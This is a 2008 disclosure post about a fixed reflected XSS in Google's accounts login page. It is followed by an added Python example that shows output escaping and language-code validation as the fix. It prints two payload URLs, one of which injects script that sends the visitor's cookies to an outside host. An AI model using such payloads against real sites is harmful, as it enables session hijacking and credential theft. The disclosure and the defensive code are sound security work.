Google accounts SSL login page suffers from highly critical XSS
Nov 13, 2008 | Category: Google Vulns
In this case, the fact that SSL is being used on the login page does not necessarily mean that users' login information is secure. UPDATE: this was fixed a few hours after publication.
Malicious people can exploit this Google XSS to propagate malware, spyware, adware and steal authentication credentials.
Mirror:
http://www.xssed.com/mirror/54247/
XSS:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone
Redirection and document.cookie PoC:
https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e'"><SCRIPT>location.href+%3D+'http%3A%2F%2Fwww.xssed.com/?'%2Bdocument.cookie<%2FSCRIPT>&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=services&utm_medium=redirect&utm_campaign=standalone
Mirror of similar old Google XSS (now fixed):
http://www.xssed.com/mirror/25472/
Security researcher “Xylitol” is credited with the discovery of this critical bug.
It is only a matter of minutes before we see it fixed by Google.
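Why the hl parameter in the URLs above is dangerous when reflected, and how validation plus output encoding neutralizes it, shown as an added example (not Google's code and not part of the original post). The "Sign in" title template and all function names are assumptions, since the real server-side template is not on this page; the URL is shortened from the first one listed.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Shortened from the first URL on this page (utm_* parameters dropped).
PAGE_URL = ("https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer"
            "&hl=e%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E"
            "&continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F")

DEFAULT_LANG = "en"
# Allowlist shape for an interface-language code such as "en", "pt-BR", "zh-Hant-TW".
LANG_TAG = re.compile(r"[A-Za-z]{2,3}(-[A-Za-z0-9]{2,8})*")


def get_hl(url):
    """Return the percent-decoded hl value, as a web framework hands it to the app."""
    return parse_qs(urlsplit(url).query).get("hl", [DEFAULT_LANG])[0]


def render_title_unsafe(hl):
    # Vulnerable pattern (assumed template): request data concatenated into markup.
    return "<title>Sign in (" + hl + ")</title>"


def render_title_escaped(hl):
    # Output encoding: <, >, &, " and ' become entities, so no tag can be closed or opened.
    return "<title>Sign in (" + html.escape(hl, quote=True) + ")</title>"


def safe_lang(hl):
    # Input validation: anything that is not shaped like a language code is discarded.
    return hl if LANG_TAG.fullmatch(hl) else DEFAULT_LANG


def render_title_safe(hl):
    # Defence in depth: validate first, then still escape at the point of output.
    return render_title_escaped(safe_lang(hl))


if __name__ == "__main__":
    hl = get_hl(PAGE_URL)
    print("decoded hl :", hl)
    print("unsafe     :", render_title_unsafe(hl))
    print("escaped    :", render_title_escaped(hl))
    print("validated  :", render_title_safe(hl))
```

SSL does not change any of this: the unsafe output is delivered over the encrypted channel and runs in the login page's own origin, which is why the fix has to be made where the value is written into the page.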
